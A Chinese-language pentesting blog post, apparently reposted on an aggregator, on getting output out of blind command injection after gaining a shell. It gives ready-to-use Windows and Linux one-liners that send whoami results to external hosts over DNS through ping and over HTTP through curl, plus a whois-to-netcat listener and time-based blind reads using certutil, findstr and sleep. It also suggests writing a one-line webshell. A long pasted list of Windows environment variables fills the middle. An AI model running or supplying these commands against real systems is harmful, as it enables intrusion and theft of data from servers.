前言

最近演練遇到了拿shell后，由于是延時注入，讓我極其難受。于是，學(xué)習(xí)了一下命令執(zhí)行無回顯的一些姿勢

windows環(huán)境

1.ping %USERNAME%.2plmqc.dnslog.cn

這里的%username%為用戶變量

附上windows常用變量:

%APPDATA% : 列出應(yīng)用程序數(shù)據(jù)的默認存放位置。%CD% : 列出當(dāng)前目錄。%CLIENTNAME% : 列出聯(lián)接到終端服務(wù)會話時客戶端的NETBIOS名。%CMDCMDLINE% : 列出啟動當(dāng)前cmd.exe所使用的命令行。%CMDEXTVERSION% : 命令出當(dāng)前命令處理程序擴展版本號。%CommonProgramFiles% : 列出了常用文件的文件夾路徑。%COMPUTERNAME% : 列出了計算機名。 %COMSPEC% : 列出了可執(zhí)行命令外殼（命令處理程序）的路徑。%DATE% : 列出當(dāng)前日期。%ERRORLEVEL% : 列出了最近使用的命令的錯誤代碼。%HOMEDRIVE% : 列出與用戶主目錄所在的驅(qū)動器盤符。%HOMEPATH% : 列出用戶主目錄的完整路徑。%HOMESHARE% : 列出用戶共享主目錄的網(wǎng)絡(luò)路徑。%LOGONSEVER% : 列出有效的當(dāng)前登錄會話的域名控制器名。%NUMBER_OF_PROCESSORS% : 列出了計算機安裝的處理器數(shù)。%OS% : 列出操作系統(tǒng)的名字。(Windows XP 和 Windows 2000 列為 Windows_NT.)%Path% : 列出了可執(zhí)行文件的搜索路徑。%PATHEXT% : 列出操作系統(tǒng)認為可被執(zhí)行的文件擴展名。 %PROCESSOR_ARCHITECTURE% : 列出了處理器的芯片架構(gòu)。%PROCESSOR_IDENTFIER% : 列出了處理器的描述。%PROCESSOR_LEVEL% : 列出了計算機的處理器的型號。 %PROCESSOR_REVISION% : 列出了處理器的修訂號。%ProgramFiles% : 列出了Program Files文件夾的路徑。%PROMPT% : 列出了當(dāng)前命令解釋器的命令提示設(shè)置。%RANDOM% : 列出界于0 和 32767之間的隨機十進制數(shù)。%SESSIONNAME% : 列出連接到終端服務(wù)會話時的連接和會話名。%SYSTEMDRIVE% : 列出了Windows啟動目錄所在驅(qū)動器。%SYSTEMROOT% : 列出了Windows啟動目錄的位置。%TEMP% and %TMP% : 列出了當(dāng)前登錄的用戶可用應(yīng)用程序的默認臨時目錄。%TIME% : 列出當(dāng)前時間。%USERDOMAIN% : 列出了包含用戶帳號的域的名字。%USERNAME% : 列出當(dāng)前登錄的用戶的名字。%USERPROFILE% : 列出當(dāng)前用戶Profile文件位置。%WINDIR% : 列出操作系統(tǒng)目錄的位置。 [/size][/align][align=left][size=3]變量 類型 描述 %ALLUSERSPROFILE% 本地 返回“所有用戶”配置文件的位置。 %APPDATA% 本地 返回默認情況下應(yīng)用程序存儲數(shù)據(jù)的位置。 %CD% 本地 返回當(dāng)前目錄字符串。 %CMDCMDLINE% 本地 返回用來啟動當(dāng)前的 Cmd.exe 的準確命令行。 %CMDEXTVERSION% 系統(tǒng) 返回當(dāng)前的“命令處理程序擴展”的版本號。 %COMPUTERNAME% 系統(tǒng) 返回計算機的名稱。 %COMSPEC% 系統(tǒng) 返回命令行解釋器可執(zhí)行程序的準確路徑。 %DATE% 系統(tǒng) 返回當(dāng)前日期。使用與 date /t 命令相同的格式。由 Cmd.exe 生成。有關(guān) date 命令的詳細信息，請參閱 Date。 %ERRORLEVEL% 系統(tǒng) 返回上一條命令的錯誤代碼。通常用非零值表示錯誤。 %HOMEDRIVE% 系統(tǒng) 返回連接到用戶主目錄的本地工作站驅(qū)動器號。基于主目錄值而設(shè)置。用戶主目錄是在“本地用戶和組”中指定的。 %HOMEPATH% 系統(tǒng) 返回用戶主目錄的完整路徑。基于主目錄值而設(shè)置。用戶主目錄是在“本地用戶和組”中指定的。 %HOMESHARE% 系統(tǒng) 返回用戶的共享主目錄的網(wǎng)絡(luò)路徑。基于主目錄值而設(shè)置。用戶主目錄是在“本地用戶和組”中指定的。 %LOGONSERVER% 本地 返回驗證當(dāng)前登錄會話的域控制器的名稱。 %NUMBER_OF_PROCESSORS% 系統(tǒng) 指定安裝在計算機上的處理器的數(shù)目。 %OS% 系統(tǒng) 返回操作系統(tǒng)名稱。Windows 2000 顯示其操作系統(tǒng)為 Windows_NT。 %PATH% 系統(tǒng) 指定可執(zhí)行文件的搜索路徑。 %PATHEXT% 系統(tǒng) 返回操作系統(tǒng)認為可執(zhí)行的文件擴展名的列表。 %PROCESSOR_ARCHITECTURE% 系統(tǒng) 返回處理器的芯片體系結(jié)構(gòu)。值：x86 或 IA64（基于 Itanium）。 %PROCESSOR_IDENTFIER% 系統(tǒng) 返回處理器說明。 %PROCESSOR_LEVEL% 系統(tǒng) 返回計算機上安裝的處理器的型號。 %PROCESSOR_REVISION% 系統(tǒng) 返回處理器的版本號。 %PROMPT% 本地 返回當(dāng)前解釋程序的命令提示符設(shè)置。由 Cmd.exe 生成。 %RANDOM% 系統(tǒng) 返回 0 到 32767 之間的任意十進制數(shù)字。由 Cmd.exe 生成。 %SYSTEMDRIVE% 系統(tǒng) 返回包含 Windows server operating system 根目錄（即系統(tǒng)根目錄）的驅(qū)動器。 %SYSTEMROOT% 系統(tǒng) 返回 Windows server operating system 根目錄的位置。 %TEMP% 和 %TMP% 系統(tǒng)和用戶 返回對當(dāng)前登錄用戶可用的應(yīng)用程序所使用的默認臨時目錄。有些應(yīng)用程序需要 TEMP，而其他應(yīng)用程序則需要 TMP。 %TIME% 系統(tǒng) 返回當(dāng)前時間。使用與 time /t 命令相同的格式。由 Cmd.exe 生成。有關(guān) time 命令的詳細信息，請參閱 Time。 %USERDOMAIN% 本地 返回包含用戶帳戶的域的名稱。 %USERNAME% 本地 返回當(dāng)前登錄的用戶的名稱。 %USERPROFILE% 本地 返回當(dāng)前用戶的配置文件的位置。 %WINDIR% 系統(tǒng) 返回操作系統(tǒng)目錄的位置。%allusersprofile%--------------------所有用戶的profile路徑%Userprofile%-----------------------當(dāng)前用戶的配置文件目錄%Appdata%--------------------------當(dāng)前用戶的應(yīng)用程序路徑%commonprogramfiles%-------------應(yīng)用程序公用的文件路徑%homedrive%------------------------當(dāng)前用戶的主盤%Homepath%------------------------當(dāng)前用戶的主目錄%programfiles%----------------------應(yīng)用程序的默認安裝目錄%systemdrive%----------------------系統(tǒng)所在的盤符%systemroot%-----------------------系統(tǒng)所在的目錄%windir%----------------------------同上，總是跟systemroot一樣%tmp%------------------------------當(dāng)前用戶的臨時目錄

原文鏈接：https://blog.csdn.net/qq_17204441/article/details/89063104

2. for /F "delims=\" %i in ('whoami') do ping -n 1 %i.2plmqc.dnslog.cn

這里的可操作性比第一個多了許多

3.curl(win10或winserver2016以上自帶curl)

for /F "delims=\" %i in ('whoami') do curl http://www.c6h5no2-sec.top/test/%i

4.如果知道網(wǎng)站絕對路徑，直接寫個一句話不香嗎?

5.如果不出網(wǎng)，也無web服務(wù)的情況下，讀也不是不可以

whoami > test1234.txt & certutil -encode test1234.txt testencode.txt

將whoami的結(jié)果base64編碼以后寫入testencode.txt

讀testencode.txt,利用findstr的去正則，如果符合就會ping自己，這樣就會造成延時。

type testencode.txt || findstr "^-----BEGIN\ CERTIFICATE-----\ ZG" && ping 0.0.0.0

要注意，出現(xiàn)換行空格啥的用\空格來進行替換，建議真遇到這種致命的環(huán)境，寫腳本爆破吧

（好巧不巧，這次的一個目標就這樣子.截圖為dvwa環(huán)境），執(zhí)行成功就會延時，如圖

執(zhí)行不成功的時間

Linux環(huán)境

linux環(huán)境下感覺就比較舒服了

1.ping `whoami`.lkq1iu.dnslog.cn

2.curl http://www.c6h5no2-sec.com/test/`whoami`

3.whois -h vps:port `whoami`

vps 開nc監(jiān)聽

4.將命令結(jié)果寫入文件，延時去讀

cat test.txt | grep "^r" && sleep 4

?

SQL中的DNS外帶，懶得寫了，這個師傅寫的蠻好的

https://www.anquanke.com/post/id/98096

總結(jié)

以上是生活随笔為你收集整理的命令执行无回显的一些姿势的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。